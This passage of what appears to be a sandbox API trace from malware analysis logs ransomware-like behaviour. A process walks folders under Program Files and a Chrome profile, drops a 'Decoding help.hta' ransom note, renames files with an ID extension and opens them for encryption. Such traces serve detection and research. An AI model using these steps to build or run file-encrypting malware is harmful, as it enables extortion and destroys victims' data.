lpString2="FPSRVUTL.DLL") returned -1 [0061.254] lstrlenW (lpString="FPSRVUTL.DLL") returned 12 [0061.254] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*.*" [0061.254] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*.*") returned 83 [0061.254] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\", lpString2="FPSRVUTL.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" [0061.254] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" [0061.254] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0061.254] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.974] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x870 [0061.974] CreateFileMappingA (hFile=0x870, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x604 [0061.974] CryptAcquireContextA (phProv=0x11adfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 914 os_tid = 0x868 [0059.661] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0xfacfd30 | out: lpFindFileData=0xfacfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbcc98 [0059.674] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.674] FindNextFileW (in: hFindFile=0x10fbcc98, lpFindFileData=0xfacfd30 | out: lpFindFileData=0xfacfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.682] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.682] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.682] FindNextFileW (in: hFindFile=0x10fbcc98, lpFindFileData=0xfacfd30 | out: lpFindFileData=0xfacfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CertificateTransparency", cAlternateFileName="CERTIF~1")) returned 1 [0059.682] lstrcmpW (lpString1=".", lpString2="CertificateTransparency") returned -1 [0059.682] lstrcmpW (lpString1="..", lpString2="CertificateTransparency") returned -1 [0059.682] lstrcmpiW (lpString1="windows", lpString2="CertificateTransparency") returned 1 [0059.682] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" [0059.682] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 75 [0059.682] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="CertificateTransparency" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency" [0059.682] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*.*" [0059.682] GlobalMemoryStatus (in: lpBuffer=0xfacfd10 | out: lpBuffer=0xfacfd10) [0059.682] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24dfebf0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xde8 [0059.691] CloseHandle (hObject=0xde8) returned 1 [0059.691] FindNextFileW (in: hFindFile=0x10fbcc98, lpFindFileData=0xfacfd30 | out: lpFindFileData=0xfacfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crashpad", cAlternateFileName="")) returned 1 [0059.691] lstrcmpW (lpString1=".", lpString2="Crashpad") returned -1 [0059.691] lstrcmpW (lpString1="..", lpString2="Crashpad") returned -1 [0059.691] lstrcmpiW (lpString1="windows", lpString2="Crashpad") returned 1 [0059.692] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" [0059.692] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 75 [0059.692] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="Crashpad" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" [0059.692] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*.*" [0059.692] GlobalMemoryStatus (in: lpBuffer=0xfacfd10 | out: lpBuffer=0xfacfd10) [0059.692] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c56730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xde8 [0059.702] CloseHandle (hObject=0xde8) returned 1 [0059.702] FindNextFileW (in: hFindFile=0x10fbcc98, lpFindFileData=0xfacfd30 | out: lpFindFileData=0xfacfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c4887c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c4887c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0059.702] lstrcmpW (lpString1=".", lpString2="Default") returned -1 [0059.702] lstrcmpW (lpString1="..", lpString2="Default") returned -1 [0059.702] lstrcmpiW (lpString1="windows", lpString2="Default") returned 1 [0059.703] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" [0059.703] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 75 [0059.703] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="Default" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0059.703] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*.*" [0059.703] GlobalMemoryStatus (in: lpBuffer=0xfacfd10 | out: lpBuffer=0xfacfd10) [0059.703] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10970818, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xde8 [0059.708] CloseHandle (hObject=0xde8) returned 1 [0059.708] FindNextFileW (in: hFindFile=0x10fbcc98, lpFindFileData=0xfacfd30 | out: lpFindFileData=0xfacfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EVWhitelist", cAlternateFileName="EVWHIT~1")) returned 1 [0059.708] lstrcmpW (lpString1=".", lpString2="EVWhitelist") returned -1 [0059.708] lstrcmpW (lpString1="..", lpString2="EVWhitelist") returned -1 [0059.708] lstrcmpiW (lpString1="windows", lpString2="EVWhitelist") returned 1 [0059.708] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" [0059.708] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 75 [0059.709] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="EVWhitelist" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist" [0059.709] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\*.*" [0059.709] GlobalMemoryStatus (in: lpBuffer=0xfacfd10 | out: lpBuffer=0xfacfd10) [0059.709] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x96d2090, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xde8 [0059.712] CloseHandle (hObject=0xde8) returned 1 [0059.712] FindNextFileW (in: hFindFile=0x10fbcc98, lpFindFileData=0xfacfd30 | out: lpFindFileData=0xfacfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileTypePolicies", cAlternateFileName="FILETY~1")) returned 1 [0059.712] lstrcmpW (lpString1=".", lpString2="FileTypePolicies") returned -1 [0059.712] lstrcmpW (lpString1="..", lpString2="FileTypePolicies") returned -1 [0059.712] lstrcmpiW (lpString1="windows", lpString2="FileTypePolicies") returned 1 [0059.713] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" [0059.713] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 75 [0059.713] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="FileTypePolicies" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies" [0059.713] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\*.*" [0059.713] GlobalMemoryStatus (in: lpBuffer=0xfacfd10 | out: lpBuffer=0xfacfd10) [0059.713] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9762300, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xde8 [0059.718] CloseHandle (hObject=0xde8) returned 1 [0059.718] FindNextFileW (in: hFindFile=0x10fbcc98, lpFindFileData=0xfacfd30 | out: lpFindFileData=0xfacfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f8b8920, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f8b8920, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f8b8920, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="First Run", cAlternateFileName="FIRSTR~1")) returned 1 [0059.718] lstrcpyW (in: lpString1=0x2a6c80c0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" [0059.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 75 [0059.718] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Decoding help.hta" [0059.718] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\decoding help.hta")) returned 0xffffffff [0059.718] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac4 [0061.262] WriteFile (in: hFile=0xac4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xfacfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xfacfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.263] CloseHandle (hObject=0xac4) returned 1 [0061.263] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.263] FindNextFileW (in: hFindFile=0x10fbcc98, lpFindFileData=0xfacfd30 | out: lpFindFileData=0xfacfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85749110, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c0bcce0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0bf3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1082a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local State", cAlternateFileName="LOCALS~1")) returned 1 [0061.263] lstrcpyW (in: lpString1=0x2a6c80c0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" [0061.263] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 75 [0061.263] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Decoding help.hta" [0061.263] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\decoding help.hta")) returned 0x1 [0061.263] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Local State") returned -1 [0061.263] lstrlenW (lpString="Local State") returned 11 [0061.264] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" [0061.264] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 75 [0061.264] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="Local State" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" [0061.264] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" [0061.264] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State.[ID]g9uZrLhJaygpwRm1[ID]" [0061.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac4 [0061.265] CreateFileMappingA (hFile=0xac4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xac8 [0061.265] CryptAcquireContextA (phProv=0xfacfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 915 os_tid = 0x858 [0059.667] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*", lpFindFileData=0x904fd30 | out: lpFindFileData=0x904fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbcc98 [0059.667] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.667] FindNextFileW (in: hFindFile=0x10fbcc98, lpFindFileData=0x904fd30 | out: lpFindFileData=0x904fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, 